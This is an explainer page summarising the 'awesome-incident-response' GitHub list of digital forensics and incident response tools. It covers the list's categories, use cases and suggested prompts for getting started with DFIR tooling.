meirwah/awesome-incident-response

★ 9,032Audience · ops devopsComplexity · 1/5Setup · easy

Mindmap

mindmap
  root((awesome-incident-response))
    Evidence Collection
      Disk imaging
      Memory snapshots
      Live systems
    Analysis
      Log parsing
      Timeline building
      Sandboxes
    Platforms
      GRR Rapid Response
      IRIS
    OS-specific
      Linux tools
      macOS tools
      Windows tools
    Learning
      Books
      Videos

mindmap root((awesome-incident-response)) Evidence Collection Disk imaging Memory snapshots Live systems Analysis Log parsing Timeline building Sandboxes Platforms GRR Rapid Response IRIS OS-specific Linux tools macOS tools Windows tools Learning Books Videos

Click or tap to explore — scroll the page freely

Things people build with this

USE CASE 1

Find the right open-source forensics tool for your incident response workflow by browsing organized categories.

USE CASE 2

Set up an evidence collection toolkit for investigating compromised Linux, macOS, or Windows systems.

USE CASE 3

Learn adversary emulation to test your organization's detection and response capabilities in a controlled environment.

USE CASE 4

Build a reading list of books and videos for learning DFIR concepts from scratch.

Getting it running

Difficulty · easy Time to first run · 5min

In plain English

Awesome Incident Response is a curated list of tools and resources for Digital Forensics and Incident Response, a field commonly abbreviated as DFIR. When an organization discovers a potential security breach, DFIR teams are responsible for investigating what happened, collecting evidence, containing the damage, and putting controls in place to prevent recurrence. This list aims to give those teams a starting point for finding the right software. The list is organized into more than twenty categories. These include tools for making copies of disk images, collecting evidence from live systems, analyzing memory snapshots, parsing and searching log files, building timelines of events, and running suspicious files inside sandboxes. There are separate sections for tools specific to Linux, macOS, and Windows evidence collection. A category called adversary emulation covers tools for simulating attacker behavior in a controlled environment, which teams use to test their own detection and response capabilities. There is also a smaller set of all-in-one platforms that combine multiple forensic and case management functions into a single interface, such as GRR Rapid Response for remote live forensics and IRIS, a web-based platform for sharing investigations among analysts. Most entries are links to open-source projects on GitHub with a one-line description. Some entries point to commercial tools. A short reading list of books and a video section for learning DFIR concepts are also included. The list follows the standard awesome-list README format, which means it is easy to browse but does not include ratings or last-maintained dates. Links are checked for validity automatically via a GitHub Actions workflow. The full README is longer than what was shown.

Copy-paste prompts

Prompt 1

I need to analyze memory from a compromised Linux server. Using the awesome-incident-response tool list as a guide, which tools should I use and how do I get started with memory forensics?

Prompt 2

Help me build an incident response toolkit using open-source tools from awesome-incident-response. Recommend tools for disk imaging, log analysis, and building a timeline of events.

Prompt 3

I want to set up adversary emulation to test my team's detection capabilities. Which tools from the awesome-incident-response list are best for simulating attacker behavior safely?

Prompt 4

I am responding to a Windows security incident. Based on the awesome-incident-response list, what tools should I use for evidence collection and what order should I work in?

Open on GitHub → Explain another repo

← meirwah on gitmyhub — every repo by this author, as a profile.

Verify against the repo before relying on details.